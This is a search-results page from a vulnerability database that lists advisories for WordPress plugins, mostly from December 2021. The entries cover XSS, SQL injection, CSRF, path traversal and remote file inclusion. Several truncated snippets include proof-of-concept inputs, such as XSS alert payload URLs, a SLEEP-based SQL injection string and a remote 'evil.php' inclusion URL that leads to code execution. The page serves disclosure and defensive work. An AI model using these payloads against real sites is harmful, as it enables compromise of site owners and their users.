Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2021/12/21 12:0 a.m.522 views

Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id

The plugin does not validate or escape the forumid parameter before using it in a SQL statement when editing a forum, leading to an SQL injection issue POST /wp-admin/admin.php?page=asgarosforum-structure HTTP/1.1 Accept:...

7.2CVSS1.9AI score0.01502EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/21 12:0 a.m.108 views

Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting

The plugin does not have capability and CSRF checks in the rtbwelcomesetschedule AJAX action, allowing any authenticated users to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged in admins As a...

5.4CVSS0.1AI score0.00607EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/21 12:0 a.m.117 views

Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes

The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1 "color" or "cssclass" argument of sdmdownload shortcode, 2 "class" or "placeholder" argument of sdmsearchform shortcode. // all spaces must be replaced with a slash sdmdownload...

5.4CVSS1.6AI score0.00611EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/21 12:0 a.m.87 views

Backup and Staging by WP Time Capsule < 1.22.7 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the error parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting Once the "Server Requirements" are passed in the initial setup process you can bypass the check for localhosts by editing the islocalhost function in...

6.1CVSS6.2AI score0.00887EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/21 12:0 a.m.118 views

Simple Download Monitor < 3.9.9 - Multiple CSRF

The plugin does not enforce nonce checks, which could allow attackers to perform CSRF attacks to 1 make admins export logs to exploit a separate log disclosure vulnerability fixed in 3.9.6, 2 delete logs fixed in 3.9.9, 3 remove thumbnail image from downloads To export logs which could then be...

8.8CVSS8.6AI score0.0063EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.93 views

Event Calendar < 1.1.51 - Reflected Cross-Site Scripting

The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues And move the mouse over the 'Untitled' text Firefox only:...

6.1CVSS6.1AI score0.0081EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.108 views

ACF Photo Gallery Field < 1.7.5 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the post parameter in the includes/acfphotogallerymetaboxedit.php file before outputing back in an attribute, leading to a Reflected Cross-Site Scripting issue...

6.1CVSS1.8AI score0.008EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.110 views

Profile Extra Fields < 1.2.4 - Reflected Cross-Site Scripting

The plugin does not escape the role parameter when outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=profile-extra-fields.php&tab-action=userdata&role="alert/XSS/...

1.2AI score
Exploits0
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.100 views

AnyComment <= 0.3.1 - Open Redirect

The plugin has an API endpoint which passes user input via the redirect parameter to the wpredirect function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature...

6.1CVSS3.1AI score0.02208EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.93 views

Event Calendar < 1.1.51 - Subscriber+ Event Creation

The plugin does not have proper authorisation and CSRF checks in the addcalendarevent AJAX actions, allowing users with a role as low as subscriber to create events Adding calendar events: fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...

4.3CVSS0.8AI score0.00347EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.102 views

SEUR Oficial < 1.7.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitize and escape some of its settings allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in one of the plugin's settings: "alert'XSS'; Affected files:...

4.8CVSS0.3AI score0.00605EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/20 12:0 a.m.584 views

Tabs < 3.6.0 - Unauthenticated Arbitrary Option Update

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options...

2AI score
Exploits0References2
wpexploit
wpexploit
added 2021/12/16 12:0 a.m.691 views

Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cffaccesstoken=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cfffinalresponse=true...

5.4CVSS1.6AI score0.01217EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/16 12:0 a.m.399 views

Landing Page Builder < 1.4.9.6 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected XSS in page-builder-add on the ulpbpost admin page. http://127.0.0.1:8001/wp-admin/edit.php?posttype=ulpbpost&page=page-builder-new-landing-page&thisPostID="+style=animation-name:rotation+onanimationstart=alert1+x=...

5.4CVSS1.8AI score0.01271EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/15 12:0 a.m.607 views

Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation h...

9.8CVSS1.2AI score0.0674EPSS
Exploits1
wpexploit
wpexploit
added 2021/12/14 12:0 a.m.74 views

True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal

The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS !/usr/bin/env python3 impo...

7.5CVSS0.8AI score0.78431EPSS
Exploits5References2
wpexploit
wpexploit
added 2021/12/13 12:0 a.m.402 views

WOOCS < 1.3.7.3 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the customprices parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin-ajax.php?action=woocsgetcustompricehtml&customprices=%3Cimg%20src%20onerror=alertXSS%3E...

6.1CVSS0.7AI score0.00876EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/13 12:0 a.m.267 views

The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure

The plugin does not validate the qvquery parameter of the tpgetdlpostinfoajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts The following request allow an unauthenticated user to get the draft posts the nonce can be retriev...

7.5CVSS1.2AI score0.01815EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/13 12:0 a.m.114 views

The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection

The "WP Search Filters" widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection The request requires a nonce created with wpcreatenonce"theplus-searchfilter” which can be retrieved from a page where the widget is...

9.8CVSS0.2AI score0.01704EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/10 12:0 a.m.99 views

WP Booking System – Booking Calendar < 2.0.15 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected xss in wp-booking-system on the wpbs-calendars admin page. http://127.0.0.1:8001/wp-admin/admin.php?page=wpbs-calendars&s=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%281%29+x%3D or...

5.4CVSS1.6AI score0.00675EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/09 12:0 a.m.72 views

Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF

The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog https://examle.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...

6.5CVSS2.9AI score0.00538EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/08 12:0 a.m.50 views

WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update

The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin's settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory h...

5.7CVSS0.8AI score0.0042EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/08 12:0 a.m.57 views

PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise

The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any...

9.8CVSS0.6AI score0.06745EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/07 12:0 a.m.62 views

10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected Cross-Site Scripting XSS vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such attack against any logged in users...

6.1CVSS3.6AI score0.008EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.56 views

WooCommerce PDF Invoices & Packing Slips < 2.10.5 - Reflected Cross-Site Scripting

The plugin does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard...

4.8CVSS1.8AI score0.01188EPSS
Exploits3
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.52 views

Events Made Easy < 2.2.36 - Subscriber+ SQL Injection

The plugin does not sanitise and escape the searchtext parameter before using it in a SQL statement via the emesearchmail AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber can call it and perform SQL injection attacks...

8.8CVSS0.5AI score0.01562EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.59 views

Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...

6.1CVSS0.8AI score0.008EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.69 views

WPcalc <= 2.1 - Authenticated SQL Injection

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND SELECT 7156 FROM SELECTSLEEP5MIkl or,...

8.8CVSS1.3AI score0.01318EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.55 views

Multivendor Marketplace Solution for WooCommerce < 3.8.4 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape user input before outputting it back in HTML attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=wcmp-setting-admin&tab=vendor'alert/XSS/...

0.5AI score
Exploits0
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.56 views

Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls

All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs. v1.3.0 added CSRF checks, however authorisation was still missing and has been added in...

7.5CVSS1.4AI score0.01196EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.49 views

PowerPack Addons for Elementor < 2.6.2 - Reflected Cross-Site Scripting

The plugin does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting issue...

6.1CVSS2.1AI score0.00876EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.59 views

Stars Rating < 3.5.1 - Comments Denial of Service

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...

7.5CVSS0.8AI score0.01553EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.400 views

UpdraftPlus < 1.16.66 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the backuptimestamp and jobid parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues...

6.1CVSS1.3AI score0.01122EPSS
Exploits2References2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.358 views

Chaty Free < 2.8.3 & Pro < 2.8.2 - Reflected Cross-Site Scripting

The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E...

6.1CVSS0.6AI score0.01806EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/06 12:0 a.m.368 views

Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting

The plugin does not sanitise and escape the site-reviews parameter of the glsraction AJAX action available to unauthenticated and any authenticated users, allowing them to perform Cross-Site Scripting attacks against logged in admins viewing the Tool dashboard of the plugin...

6.1CVSS0.01314EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/05 12:0 a.m.59 views

Modal Window < 5.2.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.4AI score0.00773EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/05 12:0 a.m.67 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.2AI score0.0353EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/05 12:0 a.m.537 views

WP Coder < 2.5.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.3AI score0.0067EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/12/03 12:0 a.m.56 views

Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS

The plugin alloed any logged-in user, even a subscriber user, may add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS. 1. Run the following JavaScript in the browser's web console as a subscriber user. 2. Authenticate in a separate browser as an admin...

5.4CVSS5.4AI score0.00611EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/02 12:0 a.m.62 views

Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the "Duplicate Title" or "Duplicate Slug"...

5.4CVSS0.4AI score0.00627EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.52 views

WP Travel Engine < 5.3.1 - Editor+ Stored Cross-Site Scripting

The plugin does not escape the Description field in the Trip Destination/Activities/Trip Type and Pricing Category pages, allowing users with a role as low as editor to perform Stored Cross-Site Scripting attacks, even when the unfilteredhtml capability is disallowed As an editor or admin, add or...

5.4CVSS0.00604EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.49 views

CAOS < 4.1.9 - Admin+ Arbitrary Folder Deletion via Path Traversal

The plugin does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin As admin, put the following payload in the "Cache directory for analytics.js" setting of the plugin: ../wp-includes, tic...

4.9CVSS1.6AI score0.01021EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.49 views

OMGF < 4.5.12 - Admin+ Arbitrary Folder Deletion via Path Traversal

The plugin does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin As admin, put the following payload in the "Fonts Cache Directory" setting of the plugin: ../wp-includes, tick the "Remo...

4.9CVSS1.7AI score0.01021EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.410 views

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in Product XML Feeds Module

The plugin does not sanitise and escape the wcjcreateproductsxmlresult parameter before outputting back in the admin dashboard when the Product XML Feeds module is enabled, leading to a Reflected Cross-Site Scripting issue The "Product XML Feeds" module needs to be enabled in "Woocommerce - Boost...

6.1CVSS6.1AI score0.00757EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.386 views

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module

The plugin does not sanitise and escape the wcjdeleterole parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue The "General" module needs to be enabled in "Woocommerce - Booster Settings - Booster"...

6.1CVSS0.4AI score0.00757EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/01 12:0 a.m.404 views

Booster for Woocommerce < 5.4.9 - Reflected Cross-Site Scripting in PDF Invoicing Module

The plugin does not sanitise and escape the wcjnotice parameter before outputting it back in the admin dashboard when the Pdf Invoicing module is enabled, leading to a Reflected Cross-Site Scripting With the PDF Invoicing module active:...

6.1CVSS0.4AI score0.00757EPSS
Exploits2
wpexploit
wpexploit
added 2021/11/30 12:0 a.m.65 views

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then ...

6.1CVSS0.2AI score0.01216EPSS
Exploits2
wpexploit
wpexploit
added 2021/11/30 12:0 a.m.92 views

LiteSpeed Cache < 4.4.4 - Admin+ Reflected Cross-Site Scripting

The plugin does not escape the qcres parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting As admin, enter the following payload in the Domain Key setting of the plugin: Then open...

4.8CVSS5.4AI score0.00654EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/11/30 12:0 a.m.378 views

Video Conferencing with Zoom < 3.8.16 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape user data before outputting it back in attributes in some admin pages, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/edit.php?posttype=zoom-meetings&page=zoom-video-conferencing&hostid="alert/XSS/...

0.2AI score
Exploits0
wpexploit
wpexploit
added 2021/11/29 12:0 a.m.132 views

Buttonizer - Smart Floating Action Button < 2.5.5 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameter before outputting them in attributes and page, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Add/edit a new button, set its Button action to "Website URL"...

4.8CVSS0.3AI score0.00598EPSS
Exploits2
Total number of security vulnerabilities4359